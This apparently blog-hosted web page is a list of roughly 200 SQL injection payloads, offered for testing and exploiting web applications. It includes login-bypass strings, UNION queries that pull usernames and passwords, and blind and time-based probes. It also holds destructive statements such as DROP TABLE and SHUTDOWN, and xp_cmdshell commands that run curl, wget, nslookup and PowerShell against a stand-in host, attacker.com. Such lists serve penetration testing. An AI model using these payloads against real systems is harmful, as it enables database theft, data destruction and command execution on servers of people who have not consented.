SQL Injection Payload List
A comprehensive list of SQL injection payloads that can be used for testing and exploiting SQL injection vulnerabilities in web applications..
SQL Injection Payload List
SQL Injection Payload List
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
or 1=1
or 1=1--
or 1=1##
or 1=1/*
admin' --
admin' ##
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'##
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1##
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'##
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'##
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" ##
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"##
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1##
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"##
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"##
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
' OR '1'='1
" OR "1"="1
OR 1=1
'; DROP TABLE users; --
admin'--
' OR '1'='1' --
' OR 'a'='a
' OR 1=1 --
' OR 1=1##
' OR 1=1/*
' OR 'x'='x'
'' OR ''=''
'='
' LIKE '%'
' UNION SELECT NULL, NULL--
' UNION SELECT NULL, NULL, NULL--
' UNION SELECT username, password FROM users--
' UNION SELECT ALL FROM users--
' UNION SELECT 1, 'database' FROM information_schema.tables--
' UNION SELECT table_name, column_name FROM information_schema.columns--
' UNION SELECT @@version, NULL--
' UNION SELECT NULL, table_name FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT 1, database()--
' UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_name='users'--
'; SELECT 1/0--
' AND 1=CONVERT(int, (SELECT @@version))--
'; SELECT user, password FROM mysql.user WHERE 1=1--
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT @@version), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND 1=CAST((CHR(113)||CHR(107)||CHR(98)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (1=1) THEN CHR(49) ELSE CHR(48) END))||CHR(113)||CHR(106)||CHR(107)||CHR(120)||CHR(113)) AS NUMERIC)--
' AND 1=UTL_INADDR.get_host_name((SELECT user FROM dual))--
' AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT user())))--
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
1' AND 1=1--
1' AND 1=2--
1' AND (SELECT SUBSTRING(@@version, 1, 1))='5'--
1' AND (SELECT ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1), 1, 1)))>64--
1' AND IF(1=1, BENCHMARK(1000000, MD5(1)), 0)--
1' AND IF((SELECT user())='root', SLEEP(5), 0)--
1' AND IF((SELECT COUNT(*) FROM information_schema.tables)=0, SLEEP(5), 0)--
1' AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1), 1, 1))>65, SLEEP(5), 0)--
1' AND IF((SELECT LENGTH(database()))>1, SLEEP(5), 0)--
1' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())>1, SLEEP(5), 0)--
1' AND IF(1=1, SLEEP(5), 0)--
1' AND IF(1=2, SLEEP(5), 0)--
1' AND IF((SELECT user FROM mysql.user LIMIT 1)='root', SLEEP(5), 0)--
1' AND IF((SELECT database())='test', SLEEP(5), 0)--
1' AND SLEEP(5)--
1' AND IF((SELECT LENGTH(database()))>1, SLEEP(5), 0)--
1' AND IF((SELECT COUNT(*) FROM information_schema.tables)>10, SLEEP(5), 0)--
1' AND IF((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_name='users')>2, SLEEP(5), 0)--
1' AND IF((SELECT SUBSTRING(@@version, 1, 1))='5', SLEEP(5), 0)--
1' AND IF((SELECT LENGTH(table_name) FROM information_schema.tables LIMIT 1)=5, SLEEP(5), 0)--
' OR 1=1; EXEC xp_cmdshell('nslookup attacker.com')--
1; EXEC master..xp_dirtree '//attacker.com/test'--
1; EXEC xp_fileexist '//attacker.com/file.txt'--
'; EXEC xp_cmdshell('ping -n 1 attacker.com')--
'; EXEC xp_cmdshell('curl http://attacker.com')--
'; EXEC xp_cmdshell('wget http://attacker.com')--
'; EXEC xp_cmdshell('nslookup attacker.com')--
'; EXEC master..xp_dirtree '\\attacker.com\share'--
'; EXEC xp_regread HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion', 'ProgramFilesDir'--
'; EXEC xp_cmdshell('powershell -Command "Invoke-WebRequest -Uri http://attacker.com"')--
1'; INSERT INTO users (username, password) VALUES ('admin', 'password')--
1' OR username='admin'--
1'; DROP TABLE users--
1'; CREATE TABLE test(data varchar(100))--
1'; INSERT INTO test(data) VALUES ('test')--
1' AND IF(1=1, 1, 0)--
1' AND IF((SELECT COUNT(*) FROM users)>10, 1, 0)--
1' AND IF((SELECT LENGTH(user())>1), 1, 0)--
'; SHUTDOWN; --
'; EXEC sp_reconfigure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell('whoami');--
'; DECLARE @q nvarchar(4000); SET @q='dir'; EXEC (@q)--
' OR 1=1 --
' OR '1'='1' --
' OR 1=1/*
' OR 1=1--
' OR 'x'='x'--
--
'##
/*
'; WAITFOR DELAY '0:0:5'--
' AND 1=(SELECT COUNT(*) FROM tablenames);--
' AND 1=(SELECT TOP 1 CAST(table_name AS int) FROM information_schema.tables)--
' OR 1=(SELECT TOP 1 1 FROM information_schema.tables)--
' OR EXISTS(SELECT 1 FROM information_schema.tables WHERE table_name='users')--
' AND ascii(substring((SELECT @@version), 1, 1)) > 51 --
' AND LENGTH(USER()) > 1--
'+OR+NOT+DELAY+0:0:15
';WAITFOR DELAY '0:0:15'--
';WAITFOR DELAY '0:0:15'--
' AND CHAR(124)+USER()+CHAR(124)--
') AND '1'='1
') AND ('1'='1
' OR ''=''
' OR 1=1 --
1 AND (SELECT COUNT(*) FROM tablename) > 0 --
1' AND SLEEP(5)--
1' AND IF(ASCII(SUBSTRING((SELECT user()), 1, 1)) = 114, SLEEP(5), 0)--
1' AND BENCHMARK(5000000,MD5(1))--
1' AND IF(1=1,BENCHMARK(10000000,MD5(1)),0)--
1' AND IF(1=2,BENCHMARK(10000000,MD5(1)),0)--
1' AND IF((SELECT * FROM (SELECT(SLEEP(20)))a)--
1' OR pg_sleep(5)--
'; PG_SLEEP(5)--
' AND '1'='1
1 OR 1=1
1; WAITFOR DELAY '0:0:5'--
1' AND '1'='1
1' AND '1'='1'--
' OR 1=1--
' OR '1'='1--
' OR '1'='1'/*
1' OR '1'='1'/*
1' OR '1'='1'--
1' OR 'x'='x'--
' OR '1'='1' --
' OR 'x'='x'--
' OR 1=1 --
'; DROP TABLE users; --
' AND 1=1--
' AND 1=0--
' AND 'a'='a
' AND 'a'='b
1' AND 'a'='a
1' AND 'a'='b
' OR 'a'='a
' OR 'a'='b
' OR 'a'='c
' OR 'b'='b
' OR 'b'='c
' OR 'c'='c
1' OR 'a'='a
1' OR 'a'='b
1' OR 'a'='c
1' OR 'b'='b
1' OR 'b'='c
1' OR 'c'='c
' AND 1=1--
' AND 1=0--
1' AND 1=1--
1' AND 1=0--
' UNION ALL SELECT NULL,NULL,NULL--
' UNION ALL SELECT NULL,NULL,NULL,NULL--
' UNION ALL SELECT 1,2,3--
' UNION ALL SELECT 1,2,3,4--
' UNION ALL SELECT 1,2,3,4,5--
' UNION ALL SELECT 1,2,3,4,5,6--
' UNION ALL SELECT 1,2,3,4,5,6,7--
' UNION ALL SELECT 1,2,3,4,5,6,7,8--
' UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--
' AND 1=CONVERT(int,(SELECT COUNT(*) FROM information_schema.tables))--
This post is licensed under CC BY 4.0 by the author.